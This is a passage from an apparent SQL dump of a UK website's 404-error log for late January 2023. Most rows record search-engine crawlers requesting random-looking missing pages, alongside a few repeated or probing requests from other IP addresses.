Gecko/20100101 Firefox/103.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36654,'2023-01-24 23:20:29','/wfpgda0e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',NULL,404,'GET',NULL,'40.77.167.60'),(36655,'2023-01-24 23:23:17','/papered/a0lhpeng2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',NULL,404,'GET',NULL,'40.77.167.79'),(36656,'2023-01-24 23:25:26','/imynr9vf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36657,'2023-01-24 23:46:09','/articles/persif23','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'13.66.139.19'),(36658,'2023-01-24 23:53:51','/cremation2/ta0fe3ke2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36659,'2023-01-25 00:15:51','/14kfo5ge2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36660,'2023-01-25 00:27:41','/tag/uk/156302579','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'87.250.224.89'),(36661,'2023-01-25 00:55:14','/ayc6u66e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36662,'2023-01-25 01:01:07','/branch/isthezkf2','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',NULL,404,'GET',NULL,'40.77.167.79'),(36663,'2023-01-25 01:03:13','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3780 Safari/537.36 Edg/75.0.139','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36664,'2023-01-25 01:03:47','/15mx7s0g2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36665,'2023-01-25 01:18:40','/ravens4/ausvwbjd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',NULL,404,'GET',NULL,'40.77.167.60'),(36666,'2023-01-25 01:19:57','/articles/wilder21','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36667,'2023-01-25 01:28:58','/ta03lvuf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',NULL,404,'GET',NULL,'40.77.167.79'),(36668,'2023-01-25 01:44:19','/dasptebf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36669,'2023-01-25 01:48:02','/9r8ltige2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36670,'2023-01-25 01:59:51','/isp2q43f2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36671,'2023-01-25 02:08:19','/suppuration/im076e7e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36672,'2023-01-25 02:19:44','/9o34e7ve2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36673,'2023-01-25 02:46:36','/i2g7h09f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36674,'2023-01-25 03:01:24','/terreen1/auyxgn7e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36675,'2023-01-25 03:09:03','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.24 (KHTML, like Gecko) Chrome/80.0.1055.1 Safari/535.24','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36676,'2023-01-25 03:20:39','/jerker22/ismv0rye2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36677,'2023-01-25 03:20:50','/cornfloor/t6hpcikd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36678,'2023-01-25 03:21:49','/tf6kbmsf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36679,'2023-01-25 03:28:29','/iy86em2f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36680,'2023-01-25 03:34:52','/1y26ul8e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36681,'2023-01-25 03:43:37','/muftis/imqjgkkd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36682,'2023-01-25 03:53:12','/ddwip7tg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36683,'2023-01-25 04:00:33','/hydrosaurus/kw3xjfjd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36684,'2023-01-25 04:04:56','/vartabed14/tnw7sf8e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36685,'2023-01-25 04:05:48','/advice/scroph12','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36686,'2023-01-25 04:30:44','/dhxk0yye2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36687,'2023-01-25 04:32:30','/arboricultural/aeo0dxge2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36688,'2023-01-25 04:33:24','/cataleptic/iseu30jd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36689,'2023-01-25 04:36:08','/imuhi5fe2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36690,'2023-01-25 04:44:26','/iwmxjmcg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36691,'2023-01-25 04:47:24','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/10.0.4 Mobile/15E148 Safari/604.1','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36692,'2023-01-25 04:52:16','/9oqzlexe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36693,'2023-01-25 04:53:20','/92e9blre2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36694,'2023-01-25 04:58:30','/iwib5ktf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36695,'2023-01-25 05:16:12','/zoroastrism/tovgy4me2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36696,'2023-01-25 05:17:33','/epimera4/1hbczvsg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36697,'2023-01-25 05:23:40','/content/ZGVjaxnpdmvseq-17','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36698,'2023-01-25 05:28:15','/iwobihbg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36699,'2023-01-25 05:34:31','/19jrvh7e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36700,'2023-01-25 05:38:15','/kua782lf2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36701,'2023-01-25 05:39:51','/isp6xnve2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36702,'2023-01-25 05:40:24','/undersigned/dtvhcb3e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36703,'2023-01-25 05:49:01','/isfu4p3e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36704,'2023-01-25 05:52:17','/comments/cmVjb2duaxnl-32','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36705,'2023-01-25 05:58:53','/iedao1ke2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36706,'2023-01-25 06:06:45','/10febacf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36707,'2023-01-25 06:09:42','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:103.0) Gecko/20100101 Firefox/103.0','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36708,'2023-01-25 06:12:56','/body/tokr03ef2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36709,'2023-01-25 06:15:05','/dhpa3xre2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36710,'2023-01-25 06:17:02','/diaper/aqdto28h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36711,'2023-01-25 06:18:05','/wx31dk5e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36712,'2023-01-25 06:42:34','/data/admin/allowurl.txt','https://www.dailyjolly.co.uk','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',NULL,404,'GET',NULL,'222.186.43.66'),(36713,'2023-01-25 06:53:29','/hugy/9oval8ge2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36714,'2023-01-25 07:00:19','/tnyyta7g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.52'),(36715,'2023-01-25 07:01:28','/answers/cmF6aw5n-97','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36716,'2023-01-25 07:10:34','/observer-ethical-values-nominate-your-winner','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; Daum/4.1; +http://cs.daum.net/faq/15/4118.html?faqId=28966)',NULL,404,'GET',NULL,'211.249.246.102'),(36717,'2023-01-25 07:33:32','/aigabgvg2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36718,'2023-01-25 07:37:34','/orientating1/wpr9563e2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36719,'2023-01-25 08:05:15','/hidrotic16/93u2a0be2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36720,'2023-01-25 08:29:28','/daily-ymljb3Ju1.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36721,'2023-01-25 08:37:56','/wear-and-care-for-your-wardrobe','https://www.dailyjolly.co.uk','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',NULL,404,'GET',NULL,'87.250.224.89'),(36722,'2023-01-25 09:00:11','/d9ohtqif2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36723,'2023-01-25 09:13:42','/dwbb4ghe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36724,'2023-01-25 09:15:10','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36725,'2023-01-25 09:21:24','/denzl5df2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36726,'2023-01-25 09:24:04','/wbs3m38e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36727,'2023-01-25 09:34:42','/imfd3kee2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36728,'2023-01-25 09:49:15','/wteloyae2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36729,'2023-01-25 09:50:55','/w5ou53bf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36730,'2023-01-25 10:02:37','/denpwfhe2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36731,'2023-01-25 10:04:10','/1hled21h2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36732,'2023-01-25 10:08:20','/woods/i2uako1f2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36733,'2023-01-25 10:08:58','/symptomatically/wtmnsm5h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36734,'2023-01-25 10:13:18','/advice/c10h1415','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36735,'2023-01-25 10:25:30','/paltriest4/wpj87p2g2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36736,'2023-01-25 10:32:16','/i2cawaye2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36737,'2023-01-25 10:44:41','/1tb8t8xg2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36738,'2023-01-25 10:58:29','/forum/statio4','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.46'),(36739,'2023-01-25 11:14:55','/puffball/9orh5i0e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.79'),(36740,'2023-01-25 11:18:06','/tn25spme2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36741,'2023-01-25 11:25:38','/regal-cinema','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.101 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',NULL,404,'GET',NULL,'66.249.74.91'),(36742,'2023-01-25 11:25:56','/kcx0sjjf2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'207.46.13.155'),(36743,'2023-01-25 11:39:57','/dual34/92otunkd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.101'),(36744,'2023-01-25 11:53:26','/11rbvy1e2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36745,'2023-01-25 12:07:57','/detail/corrob12','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36746,'2023-01-25 12:15:57','/jk','https://www.dailyjolly.co.uk','Mozilla/5.0 (Linux; Android 10; Z832 Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Mobile Safari/537.36','https://www.dailyjolly.co.uk/index.php/jk',404,'GET',NULL,'173.208.253.82'),(36747,'2023-01-25 12:17:01','/a8jk6v7h2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36748,'2023-01-25 12:25:29','/14jysfae2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'40.77.167.60'),(36749,'2023-01-25 12:26:57','/pyrexia1/93ml2hkd2','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36',NULL,404,'GET',NULL,'157.55.39.192'),(36750,'2023-01-25 12:28:23','/trionychoides/9f7j5wkd2.html','https://www.dailyjolly.co.uk','Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 